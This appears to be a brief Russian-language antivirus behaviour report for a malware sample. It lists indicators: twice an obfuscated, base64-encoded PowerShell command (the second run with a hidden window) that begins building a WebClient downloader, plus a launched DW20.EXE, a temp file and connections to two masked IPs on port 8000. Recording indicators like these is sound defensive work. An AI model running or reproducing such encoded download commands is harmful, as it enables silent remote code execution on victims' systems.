Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAEEAQgBHAEEAQQA9ACgAJwBmAHcAJwArACcARAAnACsAJwBaAEEAMQAnACkAOwAkAFMAeABfAEEAUQBfAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1AF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\607483.cvr
- '91.##3.2.132':8000
- '78.##.219.147':8000
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAEEAQgBHAEEAQQA9ACgAJwBmAHcAJwArACcARAAnACsAJwBaAEEAMQAnACkAOwAkAFMAeABfAEEAUQBfAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1AF... (со скрытым окном)